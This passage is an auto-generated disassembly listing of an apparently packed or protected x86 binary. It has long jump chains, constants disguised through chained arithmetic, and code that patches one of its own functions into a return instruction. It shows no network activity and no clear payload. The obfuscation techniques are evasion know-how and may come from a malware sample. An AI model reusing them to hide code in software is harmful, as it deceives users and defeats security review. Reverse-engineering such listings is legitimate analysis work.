; FUNCTION CHUNK AT 0044492C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456B62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AD9E SIZE 00000006 BYTES

		push	ecx
		jmp	loc_43F11B
sub_45775D	endp

; ---------------------------------------------------------------------------
		push	esi
		jmp	sub_45485B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_457769:				; CODE XREF: sub_447692:loc_444984j
		jz	loc_43EA8F
		jmp	loc_44A9E2
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------

loc_457774:				; CODE XREF: k2vbe3.d:0045BC25j
		jnz	loc_459DCC
		sub	edx, ebx
		mov	ebp, 18159343h
		sbb	ebp, esi
		jmp	loc_458157
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_457788:				; CODE XREF: sub_459A60-794j
		rol	eax, 6
		ror	eax, 8
		adc	edi, ecx
		shl	ebp, 10h
; END OF FUNCTION CHUNK	FOR sub_459A60
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_457793:				; CODE XREF: sub_45A323:loc_442EBBj
					; sub_44DAF6-AAF1j ...
		jmp	loc_447F60
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E9F

loc_457798:				; CODE XREF: sub_453E9F-109A5j
					; sub_459A60-CF6j
		pop	ecx
		pop	ebp
		jmp	loc_456758
; END OF FUNCTION CHUNK	FOR sub_453E9F
; ---------------------------------------------------------------------------
		push	ebx
		push	114F385h
		pop	ebx
		rol	ebx, 2
		xor	ebx, 21597376h
		or	ebx, 171F083Bh
		and	ebx, 0F787FDFh
		add	ebx, 0F929A3A1h
		jmp	loc_45A099
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_534. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4577C7:				; DATA XREF: sub_444615+6o
		mov	ebp, esp
		push	ecx
		push	esi
		push	0EF69F03Bh
		pop	esi
		and	esi, 0AC8C620Dh
		xor	esi, 0F8701190h
		add	esi, ebp
		jmp	loc_453654
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2DF

loc_4577E4:				; CODE XREF: k2vbe3.d:0044777Fj
					; sub_44A2DF+Fj
		add	ebx, 77FBB0CFh
		add	ebx, ebp
		add	ebx, 0EF7A0524h
		mov	[ebx], eax
		pop	ebx
		popf
		pushf
		push	0FFC55E93h
		jmp	loc_455994
; END OF FUNCTION CHUNK	FOR sub_44A2DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E39D

loc_457801:				; CODE XREF: sub_44E39D:loc_44742Dj
		add	eax, 6E006911h
		call	sub_43CF62
; END OF FUNCTION CHUNK	FOR sub_44E39D
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_45780C:				; CODE XREF: sub_43F2E0+8C1Dj
		jmp	loc_44306C
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_457811:				; CODE XREF: sub_44C1BD-9005j
		jnb	loc_45987F

loc_457817:				; CODE XREF: sub_44C1BD:loc_43C2BDj
		push	eax
		push	0F509B6DFh
		pop	eax
		jmp	loc_44143F
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_457823:				; CODE XREF: sub_43E470+1710Fj
		mov	eax, 502EEAC5h
		add	eax, 0A3112FE5h
		sbb	esi, ecx

loc_457830:				; CODE XREF: sub_446E24:loc_459B31j
		push	934B131Bh
		pop	eax
		jmp	loc_455CC9
; END OF FUNCTION CHUNK	FOR sub_43E470

; =============== S U B	R O U T	I N E =======================================



sub_45783B	proc near		; CODE XREF: k2vbe3.d:0043FCC4j
					; k2vbe3.d:00459F10p
		xchg	ecx, [esp+0]
		pop	ecx
		push	1025099Eh
		pop	ecx
		rol	ecx, 19h
		push	offset sub_44B170
		jmp	nullsub_474
sub_45783B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_457852:				; CODE XREF: sub_456666-198D3j
					; sub_4582DD-14E36j ...
		mov	eax, [ebp-20h]
		movzx	eax, byte ptr [eax]
		mov	[ebp-1Ch], eax
		push	offset loc_43CAB7
		jmp	loc_44747C
; END OF FUNCTION CHUNK	FOR sub_456666

; =============== S U B	R O U T	I N E =======================================



sub_457865	proc near		; DATA XREF: sub_43C82E:loc_451EADo

; FUNCTION CHUNK AT 00448504 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B70A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E94 SIZE 00000005 BYTES

		xchg	ebp, [esp+0]
		push	4
		push	eax
		push	8C5BED88h
		pop	eax
		rol	eax, 0Eh
		jmp	loc_454E94
sub_457865	endp

; ---------------------------------------------------------------------------

loc_457879:				; CODE XREF: k2vbe3.d:0044FF15j
		jnz	loc_4484A1
		jmp	loc_43C34D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_457884:				; CODE XREF: sub_45AD42:loc_44BB32j
		pushf
		jmp	loc_4447E6
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------

loc_45788A:				; CODE XREF: k2vbe3.d:loc_45936Aj
		and	edx, 0C4151D5Eh
		xor	edx, 6383687Fh
		xor	eax, edx
		pop	edx
		rol	eax, 0Dh
		jmp	loc_4473AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_4578A1:				; CODE XREF: sub_44BDBBj
		mov	eax, ds:dword_447684
		or	eax, eax
		jmp	loc_44797D
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A40

loc_4578AE:				; CODE XREF: sub_450A40+B8C3j
		shr	esi, 15h
		sbb	ebp, edi
		jmp	loc_4596EC
; END OF FUNCTION CHUNK	FOR sub_450A40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_4578B8:				; CODE XREF: sub_450F71:loc_456EC7j
		pop	ecx
		xor	ecx, 59FAEBAFh
		add	ecx, 0A5CC345Eh
		xchg	ecx, [esp+0Ch+var_C]
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442CA7

loc_4578CD:				; CODE XREF: sub_442CA7:loc_455D16j
		push	offset sub_4568F5
		jmp	nullsub_251
; END OF FUNCTION CHUNK	FOR sub_442CA7
; ---------------------------------------------------------------------------

loc_4578D7:				; CODE XREF: k2vbe3.d:loc_457254j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_4578D8:				; CODE XREF: sub_44F028:loc_44EC14j
		or	eax, 0E8F5E76Bh
		add	ecx, 0E930764Eh
		rol	ebp, 14h
		ror	edx, 0Dh
		jmp	loc_45A77F
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C29

loc_4578EF:				; CODE XREF: sub_451C29+1Cj
		xchg	eax, [esp-8+arg_4]

loc_4578F2:				; CODE XREF: k2vbe3.d:0044FE0Fj
		jmp	sub_43C82E
; END OF FUNCTION CHUNK	FOR sub_451C29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_4578F7:				; CODE XREF: sub_44ED3C-262j
		rol	edx, 0Bh
		popf

loc_4578FB:				; CODE XREF: sub_44ED3C:loc_45424Bj
		mov	eax, [ebp-4]
		mov	eax, [eax]
		and	eax, 0FFFFFFh
		cmp	eax, 0C3C033h
		jnz	loc_44C3DD
		jmp	loc_44A4EB
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A21D

loc_457915:				; CODE XREF: sub_45A21D+8j
		push	ecx
		mov	esp, ebp

loc_457918:				; CODE XREF: sub_44B912:loc_448912j
		pop	ebp
		mov	eax, ds:dword_44DA38
		jmp	loc_452055
; END OF FUNCTION CHUNK	FOR sub_45A21D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_457924:				; CODE XREF: sub_45B74D-16A5Dj
		xchg	edi, [esp-0Ch+arg_8]
		mov	eax, edi
		pop	edi
		pop	ebp
		jmp	loc_44FBDA
; END OF FUNCTION CHUNK	FOR sub_45B74D
; ---------------------------------------------------------------------------
		push	esi
		mov	esi, ebp
		xchg	esi, [esp]
		jmp	loc_43F060
; ---------------------------------------------------------------------------

loc_45793B:				; CODE XREF: k2vbe3.d:00453341j
		jz	nullsub_307
		cmp	esi, edi
		jmp	loc_44C8C2
; ---------------------------------------------------------------------------

locret_457948:				; CODE XREF: k2vbe3.d:loc_448396j
		retn
; ---------------------------------------------------------------------------
		popf
		jmp	loc_44A1FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44316D

loc_45794F:				; CODE XREF: sub_44316D:loc_44212Fj
		call	sub_458B89
; END OF FUNCTION CHUNK	FOR sub_44316D
; START	OF FUNCTION CHUNK FOR sub_45496E

loc_457954:				; CODE XREF: sub_45496E-3E02j
		push	offset sub_444A97
		jmp	nullsub_410
; END OF FUNCTION CHUNK	FOR sub_45496E
; ---------------------------------------------------------------------------

loc_45795E:				; CODE XREF: k2vbe3.d:0044F00Cj
		xchg	ebx, [edi]

; =============== S U B	R O U T	I N E =======================================



sub_457960	proc near		; CODE XREF: sub_441C24+E9A3p

; FUNCTION CHUNK AT 0044497F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D627 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A9CF SIZE 00000015 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	77F473E7h
		pop	eax
		add	eax, 0CD1D101Dh
		or	eax, 0EF69C06Ch
		add	eax, 0AC7BE556h
		jmp	loc_44497F
sub_457960	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2FC

loc_457981:				; CODE XREF: sub_43E2FC:loc_43E9B6j
		and	esi, 25AB116Dh
		jns	loc_443C61
; END OF FUNCTION CHUNK	FOR sub_43E2FC
; START	OF FUNCTION CHUNK FOR sub_44DE63

loc_45798D:				; CODE XREF: sub_44DE63+Aj
		jmp	sub_449774
; END OF FUNCTION CHUNK	FOR sub_44DE63
; ---------------------------------------------------------------------------
		adc	esi, 0BDD0051Dh
		mov	ebp, [esi]
		jmp	loc_443C61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_45799F:				; CODE XREF: sub_4468FE+EF7j
					; sub_4468FE:loc_455590j
		call	sub_4436CE

loc_4579A4:				; CODE XREF: sub_44B870:loc_45147Cj
		mov	edx, 3CC6743Ch
		call	sub_45B20A
		push	eax
		ror	eax, 0Ch
		mov	ds:dword_458BE4, eax
		jmp	loc_43EDA9
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
		mov	edx, [ebp-18h]
		mov	[edx], eax
		jmp	loc_448E37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_4579C7:				; CODE XREF: sub_44A6BD:loc_44A76Fj
		push	edx
		mov	edx, ecx
		push	offset loc_44A15D
		jmp	nullsub_253
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_4579D4:				; CODE XREF: sub_454F9F:loc_43EA2Ej
		pop	esi
		mov	[ebp-4], eax
		inc	dword ptr [ebp-0Ch]
		dec	dword ptr [ebp-18h]
		jmp	loc_43C093
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_4579E3:				; CODE XREF: sub_44921C+EFF3j
		adc	ebx, 0DD4AC6ABh
		sbb	esi, 68426DE1h
		test	edi, esi
		jmp	loc_453197
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_4579F6:				; CODE XREF: sub_45482D:loc_43FA1Dj
		jz	loc_44D4C4
		jmp	loc_43CA65
; END OF FUNCTION CHUNK	FOR sub_45482D

; =============== S U B	R O U T	I N E =======================================



sub_457A01	proc near		; DATA XREF: sub_44B94B+B5BCo
		xchg	edi, [esp+0]
		jmp	loc_44041F
sub_457A01	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_457A09:				; CODE XREF: sub_451CF1:loc_45B014j
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44367E
		mov	eax, 276E7523h
		call	sub_4553CC
		push	esi
		jmp	loc_45BD5D
; END OF FUNCTION CHUNK	FOR sub_451CF1

; =============== S U B	R O U T	I N E =======================================



sub_457A23	proc near		; CODE XREF: k2vbe3.d:00440610p
					; k2vbe3.d:0045004Ej

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		push	0CCDF56C2h
		pop	edx
		and	edx, 8D663883h
		add	edx, 73FF42A9h
		xchg	edx, [esp-4+arg_0]
		jmp	loc_455E69
sub_457A23	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_265. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_457A42	proc near		; CODE XREF: sub_44B979+7BBp
					; k2vbe3.d:0045B0BFj

; FUNCTION CHUNK AT 00446F34 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004475BE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454664 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458F2C SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		call	sub_4544C3
		test	eax, eax
		jmp	loc_446F34
sub_457A42	endp


; =============== S U B	R O U T	I N E =======================================



sub_457A58	proc near		; CODE XREF: k2vbe3.d:00442600j
					; sub_455829-2DFp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C113 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CF27 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043EDAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BE7B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045111D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004552EC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004596BD SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B766 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 80370F54h
		xchg	edx, [esp+0]
		jmp	loc_4596BD
sub_457A58	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jl	loc_43D712
		jmp	sub_45B76B
; ---------------------------------------------------------------------------
		jb	loc_44B13C
		mov	edx, ds:dword_4563F4
		or	edx, edx
		jnz	loc_4563E2
		jmp	loc_455973
; ---------------------------------------------------------------------------

loc_457A8E:				; CODE XREF: k2vbe3.d:loc_44A142j
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		mov	esp, ebp
		pop	ebp
		jmp	loc_458BF4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E971

loc_457A9C:				; CODE XREF: sub_44E971:loc_444B8Aj
		sbb	ebp, 4093C8ECh
		jmp	loc_44B2FD
; END OF FUNCTION CHUNK	FOR sub_44E971
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456767

loc_457AA7:				; CODE XREF: sub_456767-76C1j
		add	ecx, 48451E5Ah
		xchg	ecx, [esp+0]
		jmp	sub_446E1E
; END OF FUNCTION CHUNK	FOR sub_456767
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_457AB5:				; CODE XREF: sub_440C94:loc_459E9Bj
		rol	eax, 5
		jnb	loc_454DD9

loc_457ABE:				; CODE XREF: k2vbe3.d:00445588j
		jmp	loc_456249
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
		shl	ecx, 1Eh
		xchg	ecx, [ebp+0]
		jmp	loc_454DCE
; ---------------------------------------------------------------------------

loc_457ACE:				; DATA XREF: sub_4460FD:loc_4591D7o
		mov	eax, [esp]
		push	offset loc_452E00
		jmp	loc_443BB7
; ---------------------------------------------------------------------------

loc_457ADB:				; DATA XREF: k2vbe3.d:0045A86Fo
		push	eax
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_457ADC:				; CODE XREF: sub_4460FD-2EBCj
		ror	eax, 3
		mov	ds:dword_43FAA4, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_457AE6:				; CODE XREF: k2vbe3.d:004489CCj
					; sub_459DA3-2C12j
		push	offset loc_4419F5
		jmp	loc_44FF01
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_457AF0:				; CODE XREF: sub_440CEA+129EDj
		jp	loc_4491BE
		sub	esi, 0C13476EBh

loc_457AFC:				; CODE XREF: sub_440CEA:loc_443B00j
		call	sub_450CE7
; END OF FUNCTION CHUNK	FOR sub_440CEA
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_457B01:				; CODE XREF: sub_440D7B:loc_44EA85j
		jz	loc_449DCD
		push	ebp
		mov	eax, [ebp+var_20]
		call	sub_450EDB
		pop	ecx
		mov	[ebp+var_20], eax
		jmp	loc_449DCD
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_457B19:				; CODE XREF: sub_44416D:loc_459445j
		test	byte ptr [ebp-8], 40h
		jmp	loc_449DBA
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------

loc_457B22:				; CODE XREF: k2vbe3.d:loc_447AFAj
		push	edi
		push	0A1ABD64Fh
		pop	edi
		sub	edi, ds:4000F2h
		rol	edi, 14h
		xor	edi, 0A9C6806Ah
		add	edi, 0EFD0C69Fh
		jmp	loc_459580
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_266. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_457B44:				; CODE XREF: sub_44ED3C-294Fj
		jmp	loc_454219
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_457B49	proc near		; CODE XREF: sub_4467A1:loc_441CECp
					; k2vbe3.d:0044CC1Bj

; FUNCTION CHUNK AT 00448C2B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044F685 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459F5F SIZE 00000006 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, edx
		call	sub_45C089

loc_457B54:				; CODE XREF: sub_451759-6696j
		jmp	loc_44F685
sub_457B49	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_457B59	proc near		; CODE XREF: sub_44FFD3+Ap
					; k2vbe3.d:00456501j

; FUNCTION CHUNK AT 004584E3 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	esi
		push	281CE6B5h
		pop	esi
		xor	esi, 0F636CA2h
		add	esi, 0D8C5A3FCh
		xchg	esi, [esp+0]

loc_457B73:				; CODE XREF: sub_44F174-C0A6j
		jmp	loc_4584E3
sub_457B59	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_457B78:				; CODE XREF: sub_43FE0A-39F7j
		cmp	byte ptr [eax],	0
		jnz	loc_441DFB
		mov	eax, [ebp-4]
		mov	[ebp-0Ch], eax
		jmp	loc_452A4D
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498C1

loc_457B8C:				; CODE XREF: sub_4498C1:loc_459281j
		pop	esi
		and	esi, 0B28EF3D7h
		xor	esi, 3F0A4244h

loc_457B99:				; CODE XREF: k2vbe3.d:loc_44F62Fj
		cmp	eax, esi
		pop	esi
		shr	ebx, 0Dh
		jmp	loc_44B6BF
; END OF FUNCTION CHUNK	FOR sub_4498C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_457BA4:				; CODE XREF: sub_43C3A9+DF8Cj
		jl	loc_43E8B3

loc_457BAA:				; CODE XREF: sub_43C3A9:loc_44A076j
		push	ecx
		push	79E673F6h
		pop	ecx
		sub	ecx, 0CEB7A678h
		or	ecx, 82C93478h
		and	ecx, 78C17332h
		sub	ecx, 99E2768Dh
		jmp	loc_459548
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_457BCE:				; CODE XREF: k2vbe3.d:00450A1Aj
		adc	ecx, 51C517A8h

loc_457BD4:				; CODE XREF: k2vbe3.d:00450A09j
		sub	eax, 192162FAh
		and	eax, ds:4000EAh
		sub	eax, 0E932EB42h
		add	eax, 8DA4F23Eh
		xchg	eax, [esp]
		jmp	sub_451759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_457BF4:				; CODE XREF: sub_44469A:loc_44CF8Fj
					; sub_44469A+8902j
		add	ebx, 6A1C4EDDh
		xchg	ebx, [esp+0]
		jmp	sub_43DA01
; END OF FUNCTION CHUNK	FOR sub_44469A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_127. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_457C03:				; CODE XREF: sub_44C90E-ADB9j
		test	ecx, 91B8819Dh
		jmp	loc_45B8D7
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_457C0E:				; CODE XREF: k2vbe3.d:00450C7Cj
		add	edx, 629DD46Ah
		and	edx, 0C6105EC7h
		or	edx, ds:4000F1h
		add	edx, 70C50B53h
		add	eax, edx
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_457C28:				; CODE XREF: sub_44471B+8A2Ej
		jmp	loc_45245D
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6A4

loc_457C2D:				; CODE XREF: sub_44C6A4+7j
		and	ecx, 0C3FB3608h
		add	ecx, 2F1F095h
		rol	ecx, 1Fh
		add	ecx, 3E37E9FCh
		xchg	ecx, [esp+4+var_4]
		jmp	loc_4548CB
; END OF FUNCTION CHUNK	FOR sub_44C6A4
; ---------------------------------------------------------------------------
		jmp	ds:off_41E024
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B208

loc_457C50:				; CODE XREF: sub_44B208+3DB1j
		jmp	loc_44E6C9
; END OF FUNCTION CHUNK	FOR sub_44B208
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB26

loc_457C55:				; CODE XREF: sub_44DB26+8j
		jmp	nullsub_489
; END OF FUNCTION CHUNK	FOR sub_44DB26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_457C5A:				; CODE XREF: sub_44B2D7-A494j
		jmp	loc_4571F0
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_294. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_457C60:				; CODE XREF: k2vbe3.d:0044C69Fj
		jmp	loc_457048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514E2

loc_457C65:				; CODE XREF: sub_4514E2:loc_4568A0j
		push	offset loc_44D573
		jmp	loc_441831
; END OF FUNCTION CHUNK	FOR sub_4514E2
; ---------------------------------------------------------------------------
		mov	edx, 0B242B436h
		call	sub_45B20A
		push	eax
		push	offset sub_444144

loc_457C7F:				; CODE XREF: k2vbe3.d:004453E0j
		jmp	loc_44CFF3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_408. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45051F

loc_457C85:				; CODE XREF: sub_45051F+B64Cj
		jmp	sub_44249A
; END OF FUNCTION CHUNK	FOR sub_45051F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_457C8A:				; CODE XREF: k2vbe3.d:0045158Ej
					; sub_4440E5+16B52j
		push	offset sub_45BA45
		jmp	nullsub_390
; END OF FUNCTION CHUNK	FOR sub_4440E5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_533. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_457C95:				; CODE XREF: k2vbe3.d:00441739j
					; k2vbe3.d:0045A77Aj
		jmp	loc_44ED41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C03F

loc_457C9A:				; CODE XREF: sub_44C03F+7j
					; k2vbe3.d:loc_45883Dj	...
		jmp	sub_44E00F
; END OF FUNCTION CHUNK	FOR sub_44C03F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_457C9F:				; CODE XREF: sub_44BDBB-DF77j
		jmp	nullsub_255
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_457CA4:				; CODE XREF: sub_44B94B:loc_43E32Ej
		jz	loc_44D9BA
		jmp	loc_447F38
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		adc	edx, eax
		mov	edx, ecx
		jmp	sub_43EE03
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_457CB8:				; CODE XREF: sub_45101A-A6E1j
		xchg	ebp, [esi]
		mov	[ebp+0], eax
		jmp	loc_44C27C
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------

loc_457CC2:				; CODE XREF: k2vbe3.d:004597C2j
		jnz	loc_443421
		or	ebx, 3593510Dh
		jg	loc_44157D
		jmp	loc_44EA39
; ---------------------------------------------------------------------------

loc_457CD9:				; CODE XREF: k2vbe3.d:00440A2Dj
		jle	loc_44CD4C
		or	ebp, esi
		and	esi, 62A5955Ah
		jmp	loc_446282
; ---------------------------------------------------------------------------
		call	sub_44455F
; START	OF FUNCTION CHUNK FOR sub_458F37

loc_457CF1:				; CODE XREF: sub_458F37+BC9j
		jmp	loc_45A39F
; END OF FUNCTION CHUNK	FOR sub_458F37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_457CF6:				; CODE XREF: sub_457D4B-7210j
		jmp	loc_450707
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_457CFB:				; CODE XREF: sub_451CF1-EDF4j
		jmp	loc_440358
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------

loc_457D00:				; CODE XREF: k2vbe3.d:loc_454422j
		cmp	esi, edi
		jmp	loc_459341
; ---------------------------------------------------------------------------

loc_457D07:				; CODE XREF: k2vbe3.d:0045B5BEj
		call	sub_45B64A
; START	OF FUNCTION CHUNK FOR sub_44E388

loc_457D0C:				; CODE XREF: sub_44E388+7807j
		jmp	loc_44454D
; END OF FUNCTION CHUNK	FOR sub_44E388

; =============== S U B	R O U T	I N E =======================================



sub_457D11	proc near		; DATA XREF: k2vbe3.d:0043E3CAo

; FUNCTION CHUNK AT 00448C58 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456C74 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045A27D SIZE 00000010 BYTES

		push	0C8564CCDh
		pop	eax
		and	eax, 1772CF2Ch
		or	eax, 6BB5814Bh
		test	eax, 20000000h
		jmp	loc_448C58
sub_457D11	endp


; =============== S U B	R O U T	I N E =======================================



sub_457D2E	proc near		; CODE XREF: k2vbe3.d:004515E2j
					; sub_45634D:loc_454124p
		xchg	eax, [esp+0]
		pop	eax
		call	sub_451759
		mov	ds:off_41E028, eax
		lea	eax, sub_45634D
		mov	byte ptr [eax],	0C3h
		jmp	sub_45634D
sub_457D2E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_457D4B	proc near		; CODE XREF: sub_414954+FCp
					; sub_417B4D+14p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043C352 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C5B7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043CA00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DB46 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E26E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E37C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00442378 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00442E2B SIZE 00000011 BYTES
